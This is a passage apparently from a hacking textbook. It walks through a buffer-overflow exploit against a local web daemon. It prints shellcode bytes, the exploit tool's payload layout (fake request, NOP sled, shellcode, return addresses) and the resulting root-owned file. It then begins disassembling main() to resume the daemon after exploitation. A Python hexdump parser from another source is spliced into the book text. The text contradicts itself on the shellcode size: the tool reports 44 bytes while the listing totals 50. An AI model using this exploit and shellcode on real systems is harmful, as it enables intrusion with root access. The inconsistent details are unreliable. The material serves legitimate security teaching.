The shellcode opens a file so that it gets created and then immediately closes
the file. Finally, it calls exit to avoid an infinite loop. The output below shows this
new shellcode being used with the exploit tool.
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ nasm mark.s
reader@hacking:~/booksrc $ hexdump -C mark
00000000  eb 23 5b 31 c9 88 4b 07  6a 05 58 66 b9 41 04 31  |.#[1..K.j.Xf.A.1|
00000010  d2 66 ba 80 01 cd 80 89  c3 6a 06 58 cd 80 31 c0  |.f.......j.X..1.|
00000020  89 c3 40 cd 80 e8 d8 ff  ff ff 2f 48 61 63 6b 65  |..@......./Hacke|
00000030  64 58                                             |dX|
00000032
reader@hacking:~/booksrc $ ls -l /Hacked
ls: /Hacked: No such file or directory
reader@hacking:~/booksrc $ ./xtool_tinywebd_steath.sh mark 127.0.0.1
target IP: 127.0.0.1
shellcode: mark (44 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (357 b)] [shellcode (44 b)] [ret addr (128 b)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ ls -l /Hacked
-rw------- 1 root reader 0 2007-09-17 16:59 /Hacked
reader@hacking:~/booksrc $
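Recovering a payload from a captured listing like the hexdump above is a routine step when analysing an incident. The following Python is an added example, not code from the book, that parses `hexdump -C` output back into bytes (including hexdump's `*` elision of repeated rows, with every offset cross-checked) and then runs a minimal `strings`-style scan, which surfaces the embedded `/Hacked` path; the sample listing is the hexdump above, re-typed as a constructed string.

```python
import re

# Constructed sample: the `hexdump -C mark` listing from the text, re-typed here so
# the example runs offline (the parser only reads the offset and hex columns).
SAMPLE_DUMP = """\
00000000  eb 23 5b 31 c9 88 4b 07  6a 05 58 66 b9 41 04 31  |.#[1..K.j.Xf.A.1|
00000010  d2 66 ba 80 01 cd 80 89  c3 6a 06 58 cd 80 31 c0  |.f.......j.X..1.|
00000020  89 c3 40 cd 80 e8 d8 ff  ff ff 2f 48 61 63 6b 65  |..@......./Hacke|
00000030  64 58                                             |dX|
00000032
"""

ROW_RE = re.compile(r"^([0-9a-f]{8})((?:\s+[0-9a-f]{2}){1,16})(?:\s+\|.*\|)?\s*$", re.I)
END_RE = re.compile(r"^[0-9a-f]{8}$", re.I)


def parse_hexdump_c(text: str) -> bytes:
    """Rebuild raw bytes from `hexdump -C` output, re-expanding '*' (repeated
    rows) and cross-checking every offset so a truncated listing raises."""
    out, prev_row, elided = bytearray(), b"", False
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line == "*":
            elided = True
            continue
        m = ROW_RE.match(line)
        if m:
            offset, row_hex = int(m.group(1), 16), m.group(2)
        elif END_RE.match(line):
            offset, row_hex = int(line, 16), None  # final line: total length only
        else:
            raise ValueError(f"unrecognised line: {line!r}")
        if elided:  # fill the gap with copies of the row hexdump chose not to repeat
            if not prev_row or (offset - len(out)) % len(prev_row):
                raise ValueError("'*' marker that cannot be expanded")
            out += prev_row * ((offset - len(out)) // len(prev_row))
            elided = False
        if offset != len(out):
            raise ValueError(f"offset {offset:#x} but {len(out):#x} bytes so far")
        if row_hex is None:
            break
        prev_row = bytes.fromhex("".join(row_hex.split()))
        out += prev_row
    return bytes(out)


def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Minimal `strings`-style scan: runs of printable ASCII of at least min_len."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]
```

Note that the listing totals 0x32 (50) bytes, and the scan reports `/HackedX`: the `X` is the placeholder byte the shellcode overwrites with a null terminator at runtime, which is why the file created is `/Hacked`.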
0x652 Putting Things Back Together Again
To put things back together again, we just need to repair any collateral damage
caused by the overwrite and/or shellcode, and then jump execution back
into the connection-accepting loop in main(). The disassembly of main() in
the output below shows that we can safely return to the addresses 0x08048f64,
0x08048f65, or 0x08048fb7 to get back into the connection accept loop.
reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x08048d93 <main+0>: push ebp
0x08048d94 <main+1>: mov ebp,esp
0x08048d96 <main+3>: sub esp,0x68
0x08048d99 <main+6>: and esp,0xfffffff0
0x08048d9c <main+9>: mov eax,0x0
0x08048da1 <main+14>: sub esp,eax
.:[ output trimmed ]:.
0x08048f4b <main+440>: mov DWORD PTR [esp],eax
0x08048f4e <main+443>: call 0x8048860 <listen@plt>
0x08048f53 <main+448>: cmp eax,0xffffffff
0x08048f56 <main+451>: jne 0x8048f64 <main+465>
0x08048f58 <main+453>: mov DWORD PTR [esp],0x804961a